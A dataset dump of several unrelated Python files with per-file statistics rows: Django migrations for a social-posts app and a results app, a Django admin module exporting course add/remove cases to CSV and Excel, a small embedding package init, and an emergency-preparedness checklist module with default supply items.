('updated_at', models.DateTimeField(blank=True, null=True)),
('post', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='posts.post')),
],
),
migrations.CreateModel(
name='PostAlbum',
fields=[
('post_album_id', models.AutoField(primary_key=True, serialize=False)),
('photo', django_resized.forms.ResizedImageField(blank=True, crop=None, force_format=None, keep_meta=True, null=True, quality=75, size=[200, 200], storage=django.core.files.storage.FileSystemStorage(location='E:\\Projects/winoutt-django/posts/static/posts/post_attached_images/'), upload_to='')),
('photo_original', django_resized.forms.ResizedImageField(blank=True, crop=None, force_format=None, keep_meta=True, null=True, quality=75, size=[1920, 1080], storage=django.core.files.storage.FileSystemStorage(location='E:\\Projects/winoutt-django/posts/static/posts/post_attached_images/'), upload_to='')),
('filename', models.FileField(blank=True, null=True, storage=django.core.files.storage.FileSystemStorage(location='E:\\Projects/winoutt-django/posts/static/posts/post_attached_files/'), upload_to='')),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.post')),
],
),
migrations.CreateModel(
name='PollVote',
fields=[
('poll_vote_id', models.AutoField(primary_key=True, serialize=False)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('poll', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.poll')),
('poll_choice', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.pollchoice')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddField(
model_name='poll',
name='post',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='posts.post'),
),
migrations.CreateModel(
name='LinkPreview',
fields=[
('link_preview_id', models.AutoField(primary_key=True, serialize=False)),
('previewable_id', models.BigIntegerField(blank=True, null=True)),
('title', models.CharField(max_length=255)),
('description', models.TextField()),
('url', models.CharField(max_length=255)),
('image', models.CharField(max_length=255)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('previewable_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.contenttype')),
],
),
migrations.CreateModel(
name='Favorite',
fields=[
('favorite_id', models.AutoField(primary_key=True, serialize=False)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.post')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='CommentVote',
fields=[
('comment_vote_id', models.AutoField(primary_key=True, serialize=False)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('comment', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.comment')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='CommentMention',
fields=[
('comment_mention_id', models.AutoField(primary_key=True, serialize=False)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('comment', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.comment')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='CommentHashtag',
fields=[
('comment_hashtag_id', models.AutoField(primary_key=True, serialize=False)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('comment', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.comment')),
('hashtag', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.hashtag')),
],
),
migrations.AddField(
model_name='comment',
name='post',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.post'),
),
migrations.AddField(
model_name='comment',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.CreateModel(
name='AuthorStarView',
fields=[
('author_star_view_id', models.AutoField(primary_key=True, serialize=False)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, default=datetime.datetime.now, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posts.post')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| 62.365854 | 324 | 0.606831 | 1,577 | 15,342 | 5.767914 | 0.091947 | 0.062335 | 0.126979 | 0.154354 | 0.865655 | 0.853782 | 0.83993 | 0.83993 | 0.805299 | 0.799582 | 0 | 0.007645 | 0.249707 | 15,342 | 245 | 325 | 62.620408 | 0.782556 | 0.002933 | 0 | 0.676471 | 1 | 0 | 0.131229 | 0.030565 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.02521 | 0 | 0.042017 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d1b0eb98fd84f3714cc1748d14e924bf113001b5 | 10,169 | py | Python | arcreg/blueslip/export.py | CodeFanatic23/ARCRegistration | cbc6b8f4742ad741d1f880ca0cb2dd49c904f436 | [
"MIT"
] | null | null | null | arcreg/blueslip/export.py | CodeFanatic23/ARCRegistration | cbc6b8f4742ad741d1f880ca0cb2dd49c904f436 | [
"MIT"
] | 3 | 2020-02-12T00:10:58.000Z | 2021-06-10T19:49:13.000Z | arcreg/blueslip/export.py | CodeFanatic23/ARCRegistration | cbc6b8f4742ad741d1f880ca0cb2dd49c904f436 | [
"MIT"
] | 1 | 2022-01-12T09:37:25.000Z | 2022-01-12T09:37:25.000Z | import csv
import xlwt
from django.utils.encoding import smart_str
import openpyxl
from openpyxl.utils import get_column_letter
from django.http import HttpResponse
from django.http import HttpResponseRedirect
class ExportRemove:
def export_csv(self,modeladmin, request, queryset):
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename=REMOVE_CASES.csv'
writer = csv.writer(response, csv.excel)
response.write(u'\ufeff'.encode('utf8')) # BOM (optional...Excel needs it to open UTF-8 file properly)
writer.writerow([
smart_str(u"ID"),
smart_str(u"Name"),
smart_str(u"ID_no"),
smart_str(u"Course ID"),
smart_str(u"Class No."),
smart_str(u"Course Title"),
smart_str(u"Lecture"),
smart_str(u"Tutorial"),
smart_str(u"Practical"),
smart_str(u"Graded Component"),
smart_str(u"Project Component"),
])
for obj in queryset:
writer.writerow([
smart_str(obj.pk),
smart_str(obj.name),
smart_str(obj.ID_no),
smart_str(obj.course_id),
smart_str(obj.class_nbr),
smart_str(obj.course_title),
smart_str(obj.lecture_no),
smart_str(obj.tutorial_no),
smart_str(obj.practical_no),
smart_str(obj.graded_comp),
smart_str(obj.project_section),
])
return response
def export_xls(self,modeladmin, request, queryset):
response = HttpResponse(content_type='application/ms-excel')
response['Content-Disposition'] = 'attachment; filename=REMOVE_CASES.xls'
wb = xlwt.Workbook(encoding='utf-8')
ws = wb.add_sheet("REMOVE_CASES")
row_num = 0
columns = [
(u"ID", 2000),
(u"Name", 6000),
(u"ID No.", 8000),
(u"Course ID", 8000),
(u"Class No.", 8000),
(u"Course Title", 8000),
(u"Lecture", 8000),
(u"Tutorial", 8000),
(u"Practical", 8000),
(u"Graded Component", 8000),
(u"Project Component", 8000),
]
font_style = xlwt.XFStyle()
font_style.font.bold = True
for col_num in range(len(columns)):
ws.write(row_num, col_num, columns[col_num][0], font_style)
# set column width
ws.col(col_num).width = columns[col_num][1]
font_style = xlwt.XFStyle()
font_style.alignment.wrap = 1
for obj in queryset:
row_num += 1
row = [
obj.pk,
obj.name,
obj.ID_no,
obj.course_id,
obj.class_nbr,
obj.course_title,
obj.lecture_no,
obj.tutorial_no,
obj.practical_no,
obj.graded_comp,
obj.project_section,
]
for col_num in range(len(row)):
ws.write(row_num, col_num, row[col_num], font_style)
wb.save(response)
return response
def export_xlsx(self,modeladmin, request, queryset):
response = HttpResponse(content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')
response['Content-Disposition'] = 'attachment; filename=REMOVE_CASES.xlsx'
wb = openpyxl.Workbook()
ws = wb.get_active_sheet()
ws.title = "REMOVE_CASES"
row_num = 0
columns = [
(u"ID", 15),
(u"Name", 70),
(u"ID No.", 70),
(u"Course ID", 70),
(u"Class No.", 70),
(u"Course Title", 70),
(u"Lecture", 70),
(u"Tutorial", 70),
(u"Practical", 70),
(u"Graded Component", 70),
(u"Project Component", 70),
]
for col_num in range(len(columns)):
c = ws.cell(row=row_num + 1, column=col_num + 1)
c.value = columns[col_num][0]
c.font = c.font.copy(bold = True)
# set column width
ws.column_dimensions[get_column_letter(col_num+1)].width = columns[col_num][1]
for obj in queryset:
row_num += 1
row = [
obj.pk,
obj.name,
obj.ID_no,
obj.course_id,
obj.class_nbr,
obj.course_title,
obj.lecture_no,
obj.tutorial_no,
obj.practical_no,
obj.graded_comp,
obj.project_section,
]
for col_num in range(len(row)):
c = ws.cell(row=row_num + 1, column=col_num + 1)
c.value = row[col_num]
c.alignment = c.alignment.copy(wrap_text = True)
wb.save(response)
return response
class ExportAdd:
def export_csv(self,modeladmin, request, queryset):
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename=ADD_CASES.csv'
writer = csv.writer(response, csv.excel)
response.write(u'\ufeff'.encode('utf8')) # BOM (optional...Excel needs it to open UTF-8 file properly)
writer.writerow([
smart_str(u"ID"),
smart_str(u"Name"),
smart_str(u"ID_no"),
smart_str(u"Course ID"),
smart_str(u"Class No."),
smart_str(u"Course Title"),
smart_str(u"Lecture"),
smart_str(u"Tutorial"),
smart_str(u"Practical"),
smart_str(u"Graded Component"),
smart_str(u"Project Component"),
])
for obj in queryset:
writer.writerow([
smart_str(obj.pk),
smart_str(obj.name),
smart_str(obj.ID_no),
smart_str(obj.course_id),
smart_str(obj.class_nbr),
smart_str(obj.course_title),
smart_str(obj.lecture_no),
smart_str(obj.tutorial_no),
smart_str(obj.practical_no),
smart_str(obj.graded_comp),
smart_str(obj.project_section),
])
return response
def export_xls(self,modeladmin, request, queryset):
response = HttpResponse(content_type='application/ms-excel')
response['Content-Disposition'] = 'attachment; filename=ADD_CASES.xls'
wb = xlwt.Workbook(encoding='utf-8')
ws = wb.add_sheet("ADD_CASES")
row_num = 0
columns = [
(u"ID", 2000),
(u"Name", 6000),
(u"ID No.", 8000),
(u"Course ID", 8000),
(u"Class No.", 8000),
(u"Course Title", 8000),
(u"Lecture", 8000),
(u"Tutorial", 8000),
(u"Practical", 8000),
(u"Graded Component", 8000),
(u"Project Component", 8000),
]
font_style = xlwt.XFStyle()
font_style.font.bold = True
for col_num in range(len(columns)):
ws.write(row_num, col_num, columns[col_num][0], font_style)
# set column width
ws.col(col_num).width = columns[col_num][1]
font_style = xlwt.XFStyle()
font_style.alignment.wrap = 1
for obj in queryset:
row_num += 1
row = [
obj.pk,
obj.name,
obj.ID_no,
obj.course_id,
obj.class_nbr,
obj.course_title,
obj.lecture_no,
obj.tutorial_no,
obj.practical_no,
obj.graded_comp,
obj.project_section,
]
for col_num in range(len(row)):
ws.write(row_num, col_num, row[col_num], font_style)
wb.save(response)
return response
def export_xlsx(self,modeladmin, request, queryset):
response = HttpResponse(content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')
response['Content-Disposition'] = 'attachment; filename=ADD_CASES.xlsx'
wb = openpyxl.Workbook()
ws = wb.get_active_sheet()
ws.title = "ADD_CASES"
row_num = 0
columns = [
(u"ID", 15),
(u"Name", 70),
(u"ID No.", 70),
(u"Course ID", 70),
(u"Class No.", 70),
(u"Course Title", 70),
(u"Lecture", 70),
(u"Tutorial", 70),
(u"Practical", 70),
(u"Graded Component", 70),
(u"Project Component", 70),
]
for col_num in range(len(columns)):
c = ws.cell(row=row_num + 1, column=col_num + 1)
c.value = columns[col_num][0]
c.font = c.font.copy(bold = True)
# set column width
ws.column_dimensions[get_column_letter(col_num+1)].width = columns[col_num][1]
for obj in queryset:
row_num += 1
row = [
obj.pk,
obj.name,
obj.ID_no,
obj.course_id,
obj.class_nbr,
obj.course_title,
obj.lecture_no,
obj.tutorial_no,
obj.practical_no,
obj.graded_comp,
obj.project_section,
]
for col_num in range(len(row)):
c = ws.cell(row=row_num + 1, column=col_num + 1)
c.value = row[col_num]
c.alignment = c.alignment.copy(wrap_text = True)
wb.save(response)
return response | 34.471186 | 114 | 0.496706 | 1,130 | 10,169 | 4.293805 | 0.1 | 0.074196 | 0.040808 | 0.021434 | 0.956513 | 0.956513 | 0.956513 | 0.950948 | 0.947238 | 0.947238 | 0 | 0.026861 | 0.392271 | 10,169 | 295 | 115 | 34.471186 | 0.758252 | 0.018389 | 0 | 0.894942 | 0 | 0 | 0.121772 | 0.028197 | 0 | 0 | 0 | 0 | 0 | 1 | 0.023346 | false | 0 | 0.027237 | 0 | 0.081712 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ae7c2c6bda756004708024e388784ecdde0b8950 | 1,536 | py | Python | result/migrations/tab/0072_auto_20200105_0926.py | Uqhs-1/uqhs | 1c7199d8c23a9d9eb3f75b1e36633a145fd2cd40 | [
"MIT"
] | 3 | 2020-06-16T20:03:31.000Z | 2021-01-17T20:45:51.000Z | result/migrations/tab/0072_auto_20200105_0926.py | Uqhs-1/uqhs | 1c7199d8c23a9d9eb3f75b1e36633a145fd2cd40 | [
"MIT"
] | 8 | 2020-02-08T09:04:08.000Z | 2021-06-09T18:31:03.000Z | result/migrations/tab/0072_auto_20200105_0926.py | Uqhs-1/uqhs | 1c7199d8c23a9d9eb3f75b1e36633a145fd2cd40 | [
"MIT"
] | null | null | null | # Generated by Django 2.1.3 on 2020-01-05 07:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('result', '0071_auto_20191229_0935'),
]
operations = [
migrations.AlterField(
model_name='btutor',
name='created',
field=models.DateTimeField(default='2020-01-05', max_length=200),
),
migrations.AlterField(
model_name='downloadformat',
name='created',
field=models.DateTimeField(default='2020-01-05', max_length=200),
),
migrations.AlterField(
model_name='qsubject',
name='agn',
field=models.FloatField(blank=True, default=0, max_length=2, null=True),
),
migrations.AlterField(
model_name='qsubject',
name='atd',
field=models.FloatField(blank=True, default=0, max_length=2, null=True),
),
migrations.AlterField(
model_name='qsubject',
name='exam',
field=models.FloatField(blank=True, default=0, max_length=2, null=True),
),
migrations.AlterField(
model_name='qsubject',
name='test',
field=models.FloatField(blank=True, default=0, max_length=2, null=True),
),
migrations.AlterField(
model_name='qsubject',
name='total',
field=models.FloatField(blank=True, default=0, max_length=4, null=True),
),
]
| 31.346939 | 84 | 0.567708 | 158 | 1,536 | 5.411392 | 0.316456 | 0.163743 | 0.204678 | 0.237427 | 0.735673 | 0.735673 | 0.721637 | 0.721637 | 0.721637 | 0.666667 | 0 | 0.059099 | 0.30599 | 1,536 | 48 | 85 | 32 | 0.742964 | 0.029297 | 0 | 0.642857 | 1 | 0 | 0.095366 | 0.015447 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.02381 | 0 | 0.095238 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
881fcf96d1756b1b9d69ddaff40cd52848d21f6a | 90 | py | Python | woffle/embed/numeric/fasttext/__init__.py | karetsu/chatter | f93a2749b28187e63768dce0c9de29203c8868cb | [
"MIT"
] | 5 | 2019-03-06T14:35:46.000Z | 2022-01-15T22:33:59.000Z | woffle/embed/numeric/fasttext/__init__.py | karetsu/chatter | f93a2749b28187e63768dce0c9de29203c8868cb | [
"MIT"
] | 29 | 2018-12-03T12:47:19.000Z | 2019-01-21T14:58:46.000Z | woffle/embed/numeric/fasttext/__init__.py | karetsu/chatter | f93a2749b28187e63768dce0c9de29203c8868cb | [
"MIT"
] | 2 | 2018-12-12T14:41:14.000Z | 2018-12-14T20:53:01.000Z | # list operations
from .embed import embed
# element operations
from .embed import embed_
| 18 | 25 | 0.8 | 12 | 90 | 5.916667 | 0.5 | 0.394366 | 0.535211 | 0.704225 | 0.84507 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.155556 | 90 | 4 | 26 | 22.5 | 0.934211 | 0.377778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 9 |
8860ba6903c4019fe8022ca58343ea16bff6bcd1 | 22,639 | py | Python | geokey_checklist/base.py | prickles/geokey-checklist | 559bc22cd7bc817e316dd9482436f301832b76a9 | [
"MIT"
] | null | null | null | geokey_checklist/base.py | prickles/geokey-checklist | 559bc22cd7bc817e316dd9482436f301832b76a9 | [
"MIT"
] | null | null | null | geokey_checklist/base.py | prickles/geokey-checklist | 559bc22cd7bc817e316dd9482436f301832b76a9 | [
"MIT"
] | null | null | null | from model_utils import Choices
TYPE = Choices(
('Home', 'Home'),
('Work', 'Work'),
('School', 'School'),
('PlaceOfWorship', 'Place of Worship'),
('Vehicle', 'Vehicle'),
('Blank', 'Blank')
)
ITEM_TYPE = Choices(
('Essential', 'Essential'),
('Useful', 'Useful'),
('Personal', 'Personal'),
('Fixit', 'Fix It'),
('Children', 'Children'),
('Toddlers', 'Toddlers'),
('Infants', 'Infants'),
('Pets', 'Pets'),
('Custom', 'Custom')
)
EXPIRY_FACTOR = Choices(
('-1', 'Yesterday'), #this is only for testing purposes
('30', 'One Month'),
('60', 'Two Months'),
('90', 'Three Months'),
('180', 'Six Months'),
('270', 'Nine Months'),
('365', 'One Year'),
('730', 'Two Years'),
('1825', 'Five Years'),
('999999', 'Never')
)
PER_TYPE = Choices(
('individual', 'Per Individual'),
('location', 'Per Location')
)
FREQUENCY_EXPIRED_REMINDER = Choices(
(30, 'one_month', 'every month'),
(60, 'two_months', 'every two months'),
(90, 'three_months', 'every three months'),
(180, 'six_months', 'every six months'),
(365, 'one_year', 'once a year')
)
REMINDER_BEFORE_EXPIRATION = Choices(
(180, 'six_months', 'six months'),
(90, 'three_months', 'three months'),
(30, 'one_month', 'one month'),
(7, 'one_week', 'one week'),
(1, 'one_day', 'one day'),
(999999, 'never', 'never')
)
DEFAULT_ITEMS = [
{'checklisttype':'Home','name':'Toys (Children)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Children','quantityfactor':'1','pertype':'individual','quantityunit':'toy','expiryfactor':'365'},
{'checklisttype':'Home','name':'Snacks (Children)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Children','quantityfactor':'7','pertype':'individual','quantityunit':'snacks','expiryfactor':'180'},
{'checklisttype':'Home','name':'Warm Clothes (Children)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Children','quantityfactor':'7','pertype':'individual','quantityunit':'clothes','expiryfactor':'180'},
{'checklisttype':'Home','name':'Sturdy Shoes (Adults)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Children','quantityfactor':'1','pertype':'individual','quantityunit':'pair','expiryfactor':'180'},
{'checklisttype':'Home','name':'Coats (Children)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Children','quantityfactor':'1','pertype':'individual','quantityunit':'coat','expiryfactor':'180'},
{'checklisttype':'Home','name':'Comfort Items (Children)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Children','quantityfactor':'1','pertype':'individual','quantityunit':'item(s)','expiryfactor':'180'},
{'checklisttype':'Home','name':'Warm Blanket (Adults)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Children','quantityfactor':'1','pertype':'individual','quantityunit':'blanket(s)','expiryfactor':'180'},
{'checklisttype':'Home','name':'Non-perishable food','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'7','pertype':'individual','quantityunit':'days','expiryfactor':'180'},
{'checklisttype':'Home','name':'Water','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'7','pertype':'individual','quantityunit':'gallons','expiryfactor':'180'},
{'checklisttype':'Home','name':'First Aid Kit - Large','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'1','pertype':'location','quantityunit':'large kit','expiryfactor':'180'},
{'checklisttype':'Home','name':'Flashlight & batteries (unless wind-up)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'1','pertype':'individual','quantityunit':'flashlight','expiryfactor':'180'},
{'checklisttype':'Home','name':'Lantern ','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'1','pertype':'location','quantityunit':'lantern','expiryfactor':'180'},
{'checklisttype':'Home','name':'Camping Stove / Propane BBQ','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'1','pertype':'location','quantityunit':'stove','expiryfactor':'180'},
{'checklisttype':'Home','name':'Radio (wind-up or with extra batteries)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Useful','quantityfactor':'1','pertype':'location','quantityunit':'radio','expiryfactor':'180'},
{'checklisttype':'Home','name':'Emergency Phone Number List','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'1','pertype':'location','quantityunit':'list','expiryfactor':'180'},
{'checklisttype':'Home','name':'Bar soap','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'1','pertype':'individual','quantityunit':'bar','expiryfactor':'365'},
{'checklisttype':'Home','name':'Hand Sanitizer','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'1','pertype':'individual','quantityunit':'large pump bottle','expiryfactor':'365'},
{'checklisttype':'Home','name':'Paper Towels','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'1','pertype':'individual','quantityunit':'roll','expiryfactor':'730'},
{'checklisttype':'Home','name':'Make it Through List','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'1','pertype':'location','quantityunit':'list','expiryfactor':'365'},
{'checklisttype':'Home','name':'Manual Can Opener','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'1','pertype':'location','quantityunit':'opener','expiryfactor':'365'},
{'checklisttype':'Home','name':'Fire Extinguisher','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'1','pertype':'location','quantityunit':'extinguisher','expiryfactor':'365'},
{'checklisttype':'Home','name':'Wrench or Gas Shut-Off tool','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'1','pertype':'location','quantityunit':'tool','expiryfactor':'365'},
{'checklisttype':'Home','name':'Waterproof Matches or Magnesium Fire Starter','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Essential','quantityfactor':'1','pertype':'location','quantityunit':'box','expiryfactor':'365'},
{'checklisttype':'Home','name':'Formula','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Infants','quantityfactor':'7','pertype':'individual','quantityunit':'days','expiryfactor':'180'},
{'checklisttype':'Home','name':'Diapers','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Infants','quantityfactor':'42','pertype':'individual','quantityunit':'diapers','expiryfactor':'180'},
{'checklisttype':'Home','name':'Baby Wipes (Infants)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Infants','quantityfactor':'2','pertype':'individual','quantityunit':'packs','expiryfactor':'180'},
{'checklisttype':'Home','name':'Baby Food','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Infants','quantityfactor':'7','pertype':'individual','quantityunit':'days','expiryfactor':'180'},
{'checklisttype':'Home','name':'Diaper Rash Ointment (Infants)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Infants','quantityfactor':'1','pertype':'individual','quantityunit':'tube','expiryfactor':'180'},
{'checklisttype':'Home','name':'Toys (Infants)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Infants','quantityfactor':'1','pertype':'individual','quantityunit':'toy','expiryfactor':'180'},
{'checklisttype':'Home','name':'Warm Clothes (Infants)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Infants','quantityfactor':'7','pertype':'individual','quantityunit':'pieces of clothing','expiryfactor':'180'},
{'checklisttype':'Home','name':'Sturdy Shoes (Infants)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Infants','quantityfactor':'1','pertype':'individual','quantityunit':'pair','expiryfactor':'180'},
{'checklisttype':'Home','name':'Coats (Infants)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Infants','quantityfactor':'1','pertype':'individual','quantityunit':'coat','expiryfactor':'180'},
{'checklisttype':'Home','name':'Comfort Items (Infants)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Infants','quantityfactor':'1','pertype':'individual','quantityunit':'item','expiryfactor':'180'},
{'checklisttype':'Home','name':'Pacifier','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Infants','quantityfactor':'2','pertype':'individual','quantityunit':'pacifiers','expiryfactor':'180'},
{'checklisttype':'Home','name':'Bottles','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Infants','quantityfactor':'1','pertype':'individual','quantityunit':'bottles','expiryfactor':'180'},
{'checklisttype':'Home','name':'Warm Blanket (Infants)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Infants','quantityfactor':'1','pertype':'individual','quantityunit':'blanket(s)','expiryfactor':'180'},
#{'checklisttype':'Home','name':'Nursing Items (e.g. nursing pads, nipple cream/shield)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Infants','quantityfactor':'1','pertype':'location','quantityunit':'item','expiryfactor':'180'},
{'checklisttype':'Home','name':'Feminine Hygiene Products','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Personal','quantityfactor':'1','pertype':'individual','quantityunit':'box','expiryfactor':'180'},
{'checklisttype':'Home','name':'Birth Control','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Personal','quantityfactor':'1','pertype':'individual','quantityunit':'month supply','expiryfactor':'365'},
{'checklisttype':'Home','name':'Prescription Medication & Glasses','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Personal','quantityfactor':'1','pertype':'individual','quantityunit':'month supply','expiryfactor':'365'},
{'checklisttype':'Home','name':'Games','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Personal','quantityfactor':'1','pertype':'individual','quantityunit':'game','expiryfactor':'365'},
{'checklisttype':'Home','name':'Personal Documents','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Personal','quantityfactor':'1','pertype':'individual','quantityunit':'file','expiryfactor':'365'},
{'checklisttype':'Home','name':'Books','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Personal','quantityfactor':'1','pertype':'individual','quantityunit':'book','expiryfactor':'365'},
{'checklisttype':'Home','name':'Litter box, litter, litter scoop and garbage bags','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Pets','quantityfactor':'1','pertype':'individual','quantityunit':'clean-up supply','expiryfactor':'365'},
{'checklisttype':'Home','name':'Sturdy leashes, harnesses and carriers','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Pets','quantityfactor':'1','pertype':'individual','quantityunit':'leash & carrier','expiryfactor':'365'},
{'checklisttype':'Home','name':'Collar and Licensing Tags','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Pets','quantityfactor':'1','pertype':'individual','quantityunit':'item','expiryfactor':'365'},
{'checklisttype':'Home','name':'Toys (Pets)','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Pets','quantityfactor':'1','pertype':'individual','quantityunit':'toy','expiryfactor':'365'},
{'checklisttype':'Home','name':'Pet Food','checklistitemdescription':'','checklistitemurl':'','checklistitemtype':'Pets','quantityfactor':'7','pertype':'individual','quantityunit':'days','expiryfactor':'365'},
